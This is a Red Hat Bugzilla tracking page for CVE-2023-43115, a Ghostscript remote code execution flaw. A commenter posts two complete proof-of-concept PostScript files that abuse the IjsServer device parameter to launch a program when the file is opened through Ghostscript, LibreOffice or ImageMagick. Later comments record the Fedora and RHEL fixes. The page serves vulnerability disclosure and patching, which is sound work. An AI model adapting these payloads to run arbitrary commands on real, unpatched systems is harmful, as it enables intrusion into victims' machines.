Bug 2241108 (CVE-2023-43115)
Summary: | CVE-2023-43115 Ghostscript: GhostPDL can lead to remote code execution via crafted PostScript documents | ||
---|---|---|---|
Product: | [Other] Security Response | Reporter: | Dhananjay Arunesh <darunesh> |
Component: | vulnerability | Assignee: | Product Security <prodsec-ir-bot> |
Status: | NEW --- | QA Contact: | |
Severity: | high | Docs Contact: | |
Priority: | high | ||
Version: | unspecified | CC: | alexander.neumann, bmason, daniel, pdwyer, xili |
Target Milestone: | --- | Keywords: | Security |
Target Release: | --- | ||
Hardware: | All | ||
OS: | Linux | ||
Whiteboard: | |||
Fixed In Version: | Doc Type: | If docs needed, set a value | |
Doc Text: |
A vulnerability was found in Artifex Ghostscript in gdevijs.c, allows a malicious remote attacker to perform remote code execution via crafted PostScript documents.
|
Story Points: | --- |
Clone Of: | Environment: | ||
Last Closed: | Type: | --- | |
Regression: | --- | Mount Type: | --- |
Documentation: | --- | CRM: | |
Verified Versions: | Category: | --- | |
oVirt Team: | --- | RHEL 7.3 requirements from Atomic Host: | |
Cloudforms Team: | --- | Target Upstream Version: | |
Embargoed: | |||
Bug Depends On: | 2241112 | ||
Bug Blocks: | 2241109 |
Description
Dhananjay Arunesh
2023-09-28 06:36:11 UTC
Created ghostscript tracking bugs for this issue: Affects: fedora-all [bug 2241112] So, what's the current status regarding this vulnerability? This is highly critical: At the moment, on a fully updated Fedora 38, attackers can execute arbitrary commands when users open/use postscript files. In the following, I'll describe two ways to exploit this (and start gnome-calculator as an example): 1. Run `gs calc.ps` with the following file (or insert it as an image in LibreOffice): ------------------ %!PS-Adobe-3.0 EPSF-3.0 %%Document-Fonts: Times-Roman %%Title: print_version.eps %%Creator: PS_Write.F %%CreationDate: 02-Aug-99 %%Pages: 1 %%BoundingBox: 36 36 576 756 %%LanguageLevel: 1 %%EndComments %%BeginProlog %%EndProlog << /OutputDevice /ijs /IjsServer (gnome-calculator) >> setpagedevice ------------------ 2. Via ImageMagick: run `convert calc-convert.ps calc-convert.png`: ------------------ %!PS-Adobe-3.0 EPSF-3.0 %%Document-Fonts: Times-Roman %%Title: print_version.eps %%Creator: PS_Write.F %%CreationDate: 02-Aug-99 %%Pages: 1 %%BoundingBox: 36 36 576 756 %%LanguageLevel: 1 %%EndComments %%BeginProlog %%EndProlog % this is somehow needed to not get a null pointer dereference (will basically initialize the ijs device a bit, and then complain about unset IjsServer): { (ijs) finddevice setdevice } stopped {} {} ifelse pop % set ijserver to payload { mark /IjsServer (/usr/bin/gnome-calculator) (ijs) finddevice putdeviceprops setdevice } stopped {} {} ifelse pop ------------------ What's the plan here? :) Just to be clear: opening a LibreOffice document is enough to trigger the RCE: we've made a video here: https://twitter.com/RedTeamPT/status/1712379361146318896 Here's a video which shows the exploit for convert: https://twitter.com/RedTeamPT/status/1712379364136964411 (In reply to Alexander Neumann from comment #4) > Just to be clear: opening a LibreOffice document is enough to trigger the > RCE: we've made a video here: > https://twitter.com/RedTeamPT/status/1712379361146318896 > > Here's a video which shows the exploit for convert: > https://twitter.com/RedTeamPT/status/1712379364136964411 Hey Alexander, thanks for flagging that this had been missed. Updates to supported versions of Fedora (38: https://bodhi.fedoraproject.org/updates/FEDORA-2023-66d60c3df7, 39: https://bodhi.fedoraproject.org/updates/FEDORA-2023-c2665a9ff3) have been submitted, and will roll out once they have enough upvotes or time passes. I've also proposed this as a Final Release Blocker for Fedora 39, so it should be fixed from day one there (https://pagure.io/fedora-qa/blocker-review/issue/1408). Cool, thanks for the feedback! We really appreciate your work! This issue has been addressed in the following products: Red Hat Enterprise Linux 9.0 Extended Update Support Via RHSA-2023:5868 https://access.redhat.com/errata/RHSA-2023:5868 This issue has been addressed in the following products: Red Hat Enterprise Linux 9 Via RHSA-2023:6265 https://access.redhat.com/errata/RHSA-2023:6265 This issue has been addressed in the following products: Red Hat Enterprise Linux 9 Via RHSA-2023:6732 https://access.redhat.com/errata/RHSA-2023:6732 |